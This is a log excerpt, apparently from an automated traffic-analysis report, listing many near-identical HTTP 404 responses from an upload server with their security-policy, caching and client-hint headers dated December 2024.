                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KS1-8RPzB0Lv_c7iLtGFjZmcKJK3jBAYNptdA-urt_pRg2CNGOwwelOHjaa4LRS7WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zQZnxz-jdoHytkoMnTSKRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZyLoaYjCr-Jc-XrvFVN_QOa0zg5rYUjXF4yWWiBX3CVdzOKfd-BS-ozphNGTKaaArContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j_HjNlZEvZlwl8B9WK6kXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7bJ4bfnRhBPw_5gdvkn38o9n-HGASA01bBjYi9cjCIaeYr6GIFmYrE8kWYBt8F8qCJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-O9mM0oBOnTbNGYipsUvkVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fptvrk1rvcYhu9jn_A5I3uskYgEv56SDRQsBG9qB8z09MvacwwCAFBmhWyas9wo9KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:39 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Isq4iJRQMKS29y9Gs5d_yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Zxc7tYAlHhm3Sl77wooeKkIH811kdZ9aOsB6hjMeCyxw-L5qs44kL-oQo3zyXE2cMx5lRBc4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-j_LKLvuLRj2wyuyAUeO4VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC482Q6VrHTYGQ-osPbIpHMT_R9Ji_mfmQzjEyT4jKQEmC_X8p7dzHgHgDYhbPigdfGfTFvT4zsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:40 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ow8qcLUkI1nnVjHb151auw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kL-iL-oTdn4qTI2omROexovcwtBgGLqnkwBpQcc3WmZIPk8V1r52lVFeoCdfccpTDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:41 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gVpoI4Tv-OnyM5LOkA2eFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Y3g6nTdC_90wwTFlUzGeyiW_EWIlvUHK9oUwPShtsEkoRmh2o5u6JZoU7agqtEHPRupE7wl8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dRvZgDaa8ncDK3lhuL4Etg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UgqQLGk0pOkDiEQB7tGQfAtnR9Zrn-M0jz32kXc8TS-r-7w8W8WoC-5ZK6tHubqGjceBPNkEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-D_f3tEqjkMscKGBcSLhSLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Ng-uflHtoCJ-JOnCI818gn1ayzlH_BF1ZEO-y20tKgbTg73JkmBmuVRmo56yzlxKKD78WB1IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:43 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-G-Bj5WmIBPjDPw9VGvadDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5r37CbweChk2TGgPGhD6xqGx7C3buvydAbuDfEFBq6L0Xkl1HX9F-9P8phRepuJEWWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-On3dSMNrh260KPs37aMD_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC40j5xr93o-FJlU-oWlboUMUfc3OpGaNDQFFG24qfvcFGy7C2jX6Ww3dMxEZmU02BEUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:44 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lgHlG5LH-6cazGUvZW6cbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4bjhMdS5hK0wr_aM45rZ4SV_aqjJI59Vd-dYagUCdI5ljz3LptmFJ1xU7tgpOtYyoJDgJ9zJcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-jdX-JH2KZ9N2-ZTF924osA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70HHyfttWFnYeelbZ3SV0rZihDYIfyEBp1QQQpYIp7u-kqjNuua-ugGzVloeePY-lEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:45 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_5AvQZMnxVXeCnXSGfwdhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mvEOf972L3aJqtsYq6boVPpNe7EAHY2MpEzyaLbNDENn3FOy9m01YTUVYE68crJkKoqhDsYYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-pButS8NVCnEgLrjmwBdgPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4CDWvYQOyVlgqZx2m9j5O0OsBbK2Lh2yXhIu0NkWEC4eSrNQsaZ7JK-tsaEK45r03iMkGiEUoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:48 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-ss4z_i2c6dAdE-eS-wHAQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7GdMQ_1GDU9YW0PeH4Dg-MLrL-KdDH169tClcsZOrOKxxQwpPPd9XAVD40dDwz2O6SContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:48 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-579eDfgSk3tWZ5pZzvWEyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lavYSCKeZOPKz9eekJVvbGN-ABVDa0KgtmX5JptBia-Tw3MYy7g3P8jWYn4rJKwTz_oQlwy4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uffd8JR1FjutwqX9uTI8ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4inCmU3gufltdM5cQSqTOnCculn82Wtt1znG-8q-K4-mcaBx4SU1bOGwWFaQWkLWJGFzfnGZoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l306eLfYZfxjIx1De6vFoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4L8Ue7A9I3NxikRcb9PB8YRsnC-bzz0-7jM_m0AJIn5HKrCwSxZszP70osiDlZB1fiDMsiYFUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dtXmQLOw0BVMFnmBur0c1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
